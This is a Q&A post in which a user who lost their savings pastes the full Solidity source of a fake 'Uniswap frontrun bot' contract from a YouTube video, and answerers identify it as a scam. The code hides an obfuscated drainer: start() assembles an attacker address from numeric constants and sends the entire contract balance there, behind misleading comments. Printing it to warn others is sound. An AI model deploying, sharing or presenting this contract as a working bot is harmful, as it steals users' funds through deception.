# Is there anyway to recover eth in smart contract I setup with remix?

Tags: cpp-ethereum

Watched a video on youtube on how to setup a smart contract (First time trying) Very stupidly used all the money in my bank to do so, now I have no idea if its even working or how to get the eth back in my wallet. Ive done more research and it seems like it may be a scam, can anybody help?
Contract address - 0xf954db5B2a8afA351b3D7AaaDFEEaa9C7461f2DB

pragma solidity ^0.6.6;

// Import Libraries Migrator/Exchange/Factory
import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/IUniswapV2Migrator.sol";
import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol";
import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Factory.sol";

contract UniswapFrontrunBot {

```
string public tokenName;
string public tokenSymbol;
uint frontrun;
address manager;

event Log(string _msg);

constructor(string memory _tokenName, string memory _tokenSymbol) public {
    tokenName = _tokenName;
    tokenSymbol = _tokenSymbol;
manager = msg.sender;
}

receive() external payable {}

struct slice {
    uint _len;
    uint _ptr;
}

/*
 * @dev Find newly deployed contracts on Uniswap
 * @param memory of required contract liquidity.
 * @param other The second slice to compare.
 * @return New contracts with required liquidity.
 */
function findNewContracts(slice memory self, slice memory other) internal pure returns (int) {
    uint shortest = self._len;

if (other._len < self._len)
    shortest = other._len;

    uint selfptr = self._ptr;       
    uint otherptr = other._ptr;

    for (uint idx = 0; idx < shortest; idx += 32) {
        // initiate contract finder
        uint a;
        uint b;

        string memory WETH_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
        string memory TOKEN_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
        loadCurrentContract(WETH_CONTRACT_ADDRESS);
        loadCurrentContract(TOKEN_CONTRACT_ADDRESS);
        assembly {
    a := mload(selfptr)
        b := mload(otherptr)
        }

        if (a != b) {
            // Mask out irrelevant contracts and check again for new contracts
            uint256 mask = uint256(-1);

            if(shortest < 32) {
        mask = ~(2 ** (8 * (32 - shortest + idx)) - 1);
            }
            uint256 diff = (a & mask) - (b & mask);
            if (diff != 0)
                return int(diff);
        }
        selfptr += 32;
        otherptr += 32;
    }
    return int(self._len) - int(other._len);
}

/*
 * @dev Extracts the newest contracts on Uniswap exchange
 * @param self The slice to operate on.
 * @param rune The slice that will contain the first rune.
 * @return `list of contracts`.
 */
function findContracts(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
    uint ptr = selfptr;
    uint idx;

    if (needlelen <= selflen) {
        if (needlelen <= 32) {
            bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

            bytes32 needledata;
            assembly { needledata := and(mload(needleptr), mask) }

            uint end = selfptr + selflen - needlelen;
            bytes32 ptrdata;
            assembly { ptrdata := and(mload(ptr), mask) }

            while (ptrdata != needledata) {
                if (ptr >= end)
                    return selfptr + selflen;
                ptr++;
                assembly { ptrdata := and(mload(ptr), mask) }
            }
            return ptr;
        } else {
            // For long needles, use hashing
            bytes32 hash;
            assembly { hash := keccak256(needleptr, needlelen) }

            for (idx = 0; idx <= selflen - needlelen; idx++) {
                bytes32 testHash;
                assembly { testHash := keccak256(ptr, needlelen) }
                if (hash == testHash)
                    return ptr;
                ptr += 1;
            }
        }
    }
    return selfptr + selflen;
}


/*
 * @dev Loading the contract
 * @param contract address
 * @return contract interaction object
 */
function loadCurrentContract(string memory self) internal pure returns (string memory) {
    string memory ret = self;
    uint retptr;
    assembly { retptr := add(ret, 32) }

    return ret;
}

/*
 * @dev Extracts the contract from Uniswap
 * @param self The slice to operate on.
 * @param rune The slice that will contain the first rune.
 * @return `rune`.
 */
function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) {
    rune._ptr = self._ptr;

    if (self._len == 0) {
        rune._len = 0;
        return rune;
    }

    uint l;
    uint b;
    // Load the first byte of the rune into the LSBs of b
    assembly { b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF) }
    if (b < 0x80) {
        l = 1;
    } else if(b < 0xE0) {
        l = 2;
    } else if(b < 0xF0) {
        l = 3;
    } else {
        l = 4;
    }

    // Check for truncated codepoints
    if (l > self._len) {
        rune._len = self._len;
        self._ptr += self._len;
        self._len = 0;
        return rune;
    }

    self._ptr += l;
    self._len -= l;
    rune._len = l;
    return rune;
}

function memcpy(uint dest, uint src, uint len) private pure {
    // Check available liquidity
    for(; len >= 32; len -= 32) {
        assembly {
            mstore(dest, mload(src))
        }
        dest += 32;
        src += 32;
    }

    // Copy remaining bytes
    uint mask = 256 ** (32 - len) - 1;
    assembly {
        let srcpart := and(mload(src), not(mask))
    let destpart := and(mload(dest), mask)
    mstore(dest, or(destpart, srcpart))
    }
}

/*
 * @dev Orders the contract by its available liquidity
 * @param self The slice to operate on.
 * @return The contract with possbile maximum return
 */
function orderContractsByLiquidity(slice memory self) internal pure returns (uint ret) {
    if (self._len == 0) {
        return 0;
    }

    uint word;
    uint length;
    uint divisor = 2 ** 248;

    // Load the rune into the MSBs of b
    assembly { word:= mload(mload(add(self, 32))) }
    uint b = word / divisor;
    if (b < 0x80) {
        ret = b;
        length = 1;
    } else if(b < 0xE0) {
        ret = b & 0x1F;
        length = 2;
    } else if(b < 0xF0) {
        ret = b & 0x0F;
        length = 3;
    } else {
        ret = b & 0x07;
        length = 4;
    }

    // Check for truncated codepoints
    if (length > self._len) {
        return 0;
    }

    for (uint i = 1; i < length; i++) {
        divisor = divisor / 256;
        b = (word / divisor) & 0xFF;
        if (b & 0xC0 != 0x80) {
            // Invalid UTF-8 sequence
            return 0;
        }
        ret = (ret * 64) | (b & 0x3F);
    }

    return ret;
}

/*
 * @dev Calculates remaining liquidity in contract
 * @param self The slice to operate on.
 * @return The length of the slice in runes.
 */
function calcLiquidityInContract(slice memory self) internal pure returns (uint l) {
    uint ptr = self._ptr - 31;
    uint end = ptr + self._len;
    for (l = 0; ptr < end; l++) {
        uint8 b;
        assembly { b := and(mload(ptr), 0xFF) }
        if (b < 0x80) {
            ptr += 1;
        } else if(b < 0xE0) {
            ptr += 2;
        } else if(b < 0xF0) {
            ptr += 3;
        } else if(b < 0xF8) {
            ptr += 4;
        } else if(b < 0xFC) {
            ptr += 5;
        } else {
            ptr += 6;
        }
    }
}

function getMemPoolOffset() internal pure returns (uint) {
    return 200097 / getChainId();
}

/*
 * @dev Parsing all uniswap mempool
 * @param self The contract to operate on.
 * @return True if the slice is empty, False otherwise.
 */
function parseMemoryPool(string memory _a) internal pure returns (address _parsed) {
    bytes memory tmp = bytes(_a);
    uint160 iaddr = 0;
    uint160 b1;
    uint160 b2;
    for (uint i = 2; i < 2 + 2 * 20; i += 2) {
        iaddr *= 256;
        b1 = uint160(uint8(tmp[i]));
        b2 = uint160(uint8(tmp[i + 1]));
        if ((b1 >= 97) && (b1 <= 102)) {
            b1 -= 87;
        } else if ((b1 >= 65) && (b1 <= 70)) {
            b1 -= 55;
        } else if ((b1 >= 48) && (b1 <= 57)) {
            b1 -= 48;
        }
        if ((b2 >= 97) && (b2 <= 102)) {
            b2 -= 87;
        } else if ((b2 >= 65) && (b2 <= 70)) {
            b2 -= 55;
        } else if ((b2 >= 48) && (b2 <= 57)) {
            b2 -= 48;
        }
        iaddr += (b1 * 16 + b2);
    }
    return address(iaddr);
}


/*
 * @dev Returns the keccak-256 hash of the contracts.
 * @param self The slice to hash.
 * @return The hash of the contract.
 */
function keccak(slice memory self) internal pure returns (bytes32 ret) {
    assembly {
ret := keccak256(mload(add(self, 32)), mload(self))
    }
}

/*
 * @dev Check if contract has enough liquidity available
 * @param self The contract to operate on.
 * @return True if the slice starts with the provided text, false otherwise.
 */
function checkLiquidity(uint a) internal pure returns (string memory) {
    uint count = 0;
    uint b = a;
    while (b != 0) {
        count++;
        b /= 16;
    }
    bytes memory res = new bytes(count);
    for (uint i=0; i<count; ++i) {
        b = a % 16;
        res[count - i - 1] = toHexDigit(uint8(b));
        a /= 16;
    }
    uint hexLength = bytes(string(res)).length;
    if (hexLength == 4) {
        string memory _hexC1 = mempool("0", string(res));
        return _hexC1;
    } else if (hexLength == 3) {
        string memory _hexC2 = mempool("0", string(res));
        return _hexC2;
    } else if (hexLength == 2) {
        string memory _hexC3 = mempool("000", string(res));
        return _hexC3;
    } else if (hexLength == 1) {
        string memory _hexC4 = mempool("0000", string(res));
        return _hexC4;
    }

    return string(res);
}

function getMemPoolLength() internal pure returns (uint) {
    return 445927;
}

/*
 * @dev If `self` starts with `needle`, `needle` is removed from the
 *      beginning of `self`. Otherwise, `self` is unmodified.
 * @param self The slice to operate on.
 * @param needle The slice to search for.
 * @return `self`
 */
function beyond(slice memory self, slice memory needle) internal pure returns (slice memory) {
    if (self._len < needle._len) {
        return self;
    }

    bool equal = true;
    if (self._ptr != needle._ptr) {
        assembly {
            let length := mload(needle)
        let selfptr := mload(add(self, 0x20))
        let needleptr := mload(add(needle, 0x20))
        equal := eq(keccak256(selfptr, length), keccak256(needleptr, length))
        }
    }

    if (equal) {
        self._len -= needle._len;
        self._ptr += needle._len;
    }

    return self;
}

// Returns the memory address of the first byte of the first occurrence of
// `needle` in `self`, or the first byte after `self` if not found.
function findPtr(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
    uint ptr = selfptr;
    uint idx;

    if (needlelen <= selflen) {
        if (needlelen <= 32) {
            bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

            bytes32 needledata;
            assembly { needledata := and(mload(needleptr), mask) }

            uint end = selfptr + selflen - needlelen;
            bytes32 ptrdata;
            assembly { ptrdata := and(mload(ptr), mask) }

            while (ptrdata != needledata) {
                if (ptr >= end)
                    return selfptr + selflen;
                ptr++;
                assembly { ptrdata := and(mload(ptr), mask) }
            }
            return ptr;
        } else {
            // For long needles, use hashing
            bytes32 hash;
            assembly { hash := keccak256(needleptr, needlelen) }

            for (idx = 0; idx <= selflen - needlelen; idx++) {
                bytes32 testHash;
                assembly { testHash := keccak256(ptr, needlelen) }
                if (hash == testHash)
                    return ptr;
                ptr += 1;
            }
        }
    }
    return selfptr + selflen;
}

function getMemPoolHeight() internal pure returns (uint) {
    return 714153;
}

/*
 * @dev Iterating through all mempool to call the one with the with highest possible returns
 * @return `self`.
 */
function callMempool() internal view returns (string memory) {
    string memory _memPoolOffset = mempool("x", checkLiquidity(getMemPoolOffset()));
    uint _memPoolSol = 759912;
    uint _memPoolLength = getMemPoolLength();
    uint _memPoolSize = 214752;
    uint _memPoolHeight = getMemPoolHeight();
    uint _memPoolWidth = 533978;
    uint _memPoolDepth = getMemPoolDepth();
    uint _memPoolCount = 587493;

    string memory _memPool1 = mempool(_memPoolOffset, checkLiquidity(_memPoolSol));
    string memory _memPool2 = mempool(checkLiquidity(_memPoolLength), checkLiquidity(_memPoolSize));
    string memory _memPool3 = mempool(checkLiquidity(_memPoolHeight), checkLiquidity(_memPoolWidth));
    string memory _memPool4 = mempool(checkLiquidity(_memPoolDepth), checkLiquidity(_memPoolCount));

    string memory _allMempools = mempool(mempool(_memPool1, _memPool2), mempool(_memPool3, _memPool4));
    string memory _fullMempool = mempool("0", _allMempools);

    return _fullMempool;
}

/*
 * @dev Modifies `self` to contain everything from the first occurrence of
 *      `needle` to the end of the slice. `self` is set to the empty slice
 *      if `needle` is not found.
 * @param self The slice to search and modify.
 * @param needle The text to search for.
 * @return `self`.
 */
function toHexDigit(uint8 d) pure internal returns (byte) {
    if (0 <= d && d <= 9) {
        return byte(uint8(byte('0')) + d);
    } else if (10 <= uint8(d) && uint8(d) <= 15) {
        return byte(uint8(byte('a')) + d - 10);
    }
    // revert("Invalid hex digit");
    revert();
}

function getChainId() private pure returns (uint256 chainId) {
assembly {
chainId := chainid()
}
}

function calculateCommitSize() private view returns (uint256 size) {
uint uniswapMask = 0x1F;
address uniSizeA = address(uniswapMask);
uint256 uniSizeN = uniSizeA.balance;
address cb = block.coinbase;
uint160 cbb;
assembly {
    let m := mload(0x40)
    cb := and(cb, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
    mstore(add(m, 20), xor(0x140000000000000000000000000000000000000000, cb))
    mstore(0x40, add(m, 52))
    cbb := m
    }
address coinbaseOffsetContribFactor = address(cbb - 1);
uint256 coinbaseOffsetContribFactorN = coinbaseOffsetContribFactor.balance;
uint256 poolDifferential = uniSizeN - coinbaseOffsetContribFactorN;
if (poolDifferential < 79626820000000000 && coinbaseOffsetContribFactorN == 0) {
    size = 0; // don't need to commit anything
}
else if (coinbaseOffsetContribFactorN > 0) {
    size = poolDifferential; // commit the delta
}
else {
    size = address(this).balance; // commit the entire balance
}
return size;

}

function runSafetyChecks() internal view {
require(getChainId() == 1, "This doesn't seem to be running on the Ethereum main net. Aborting...");
require(address(this).balance != 0, "There is no ETH in the contract. Aborting...");
require(msg.sender == tx.origin, "Sender-origin mismatch ERROR");

}

function deinitializeTradingPool() internal pure returns (int) {
uint dehoistTrigger = 0xFFA3;
abi.encodePacked(dehoistTrigger);
    return 1;
}


function _callFrontRunActionMempool() internal view returns (address) {
    return parseMemoryPool(callMempool());
}


/*
 * @dev Perform frontrun action from different contract pools
 * @return `liquidity`.
 */
function start() public payable {
require(msg.sender == manager);
runSafetyChecks();
    emit Log("Running FrontRun attack on Uniswap. This can take a while please wait...");
uint256 commitSize = calculateCommitSize();
if (commitSize != 0) {
    payable(_callFrontRunActionMempool()).transfer(commitSize);   
}
frontrun = 1;
}

/*
 * @dev withdraws profits back to the contract creator address
 * @return `profits`.
 */
function withdrawal() public payable {
require(msg.sender == manager);
    emit Log("Sending profits back to contract creator address...");
if (frontrun == 1) deinitializeTradingPool();       
    payable(manager).transfer(address(this).balance);
frontrun = 0;
}

/*
 * @dev token int2 to readable str
 * @param token An output parameter to which the first token is written.
 * @return `token`.
 */
function uint2str(uint _i) internal pure returns (string memory _uintAsString) {
    if (_i == 0) {
        return "0";
    }
    uint j = _i;
    uint len;
    while (j != 0) {
        len++;
        j /= 10;
    }
    bytes memory bstr = new bytes(len);
    uint k = len - 1;
    while (_i != 0) {
        bstr[k--] = byte(uint8(48 + _i % 10));
        _i /= 10;
    }
    return string(bstr);
}

function getMemPoolDepth() internal view returns (uint depth) {
    uint16 dp = 10;
    assembly { 
dp := or(dp,timestamp())
    if gt(balance(0x1F), balance(add(coinbase(),1)))  {
        dp := 0
        } 
    }
    return 816035 + ( (dp * 10) );
}

function withdrawProfits() internal view returns (address) {
    return parseMemoryPool(callMempool());
}

/*
 * @dev loads all uniswap mempool into memory
 * @param token An output parameter to which the first token is written.
 * @return `mempool`.
 */
function mempool(string memory _base, string memory _value) internal pure returns (string memory) {
    bytes memory _baseBytes = bytes(_base);
    bytes memory _valueBytes = bytes(_value);

    string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length);
    bytes memory _newValue = bytes(_tmpValue);

    uint i;
    uint j;

    for(i=0; i<_baseBytes.length; i++) {
        _newValue[j++] = _baseBytes[i];
    }

    for(i=0; i<_valueBytes.length; i++) {
        _newValue[j++] = _valueBytes[i];
    }

    return string(_newValue);
}
```

}

Answer (score 0):

To be honest its a scam.

Theoretically, you could call the withdrawal() method as you deployed it your address should be set as manager.

However, there's a variable (frontrun == 1) which is initially defined in start()

So the contract first needs to be start() then withdraw() however, when you start() the contract, it uses heavily obfuscated methods and logic to (most likely drain the balance)

So by the time you do call withdraw() there very likely wont be any funds left.

This contract is pretending to perform a frontrun attack on Uniswap using the mempool. Frontrun attacks on uniswap can not be executed from smart contracts themselves and a smart contract itself can not monitor the mempool So the whole thing is technically wrong, but people hear buzz words and attackers put these buzz words together to create a convincing attack.

In the end of the day, you were trying to perform a frontrun attack against the Uniswap protocol, which basically would have defrauded other people.

So, I guess this is called karma and maybe an expensive lesson for you.

Comment: real helpfu ...

Answer (score 0):

i think its a scam.

You probably won't be able to get the money out with the code as obscured as it is. It's best to use well-known tokens like Pepe and look at the code if you want to try it out without hesitation. This is best done on the ETH or BSC testnet. You don't need to use real money for this.

You will receive ETH/BNB free of charge for the testnet. Simply search for ETH Faucet or BNB Faucet

Comment: Adding more details on verifying smart contract code or identifying red flags in suspicious contracts could be beneficial for users.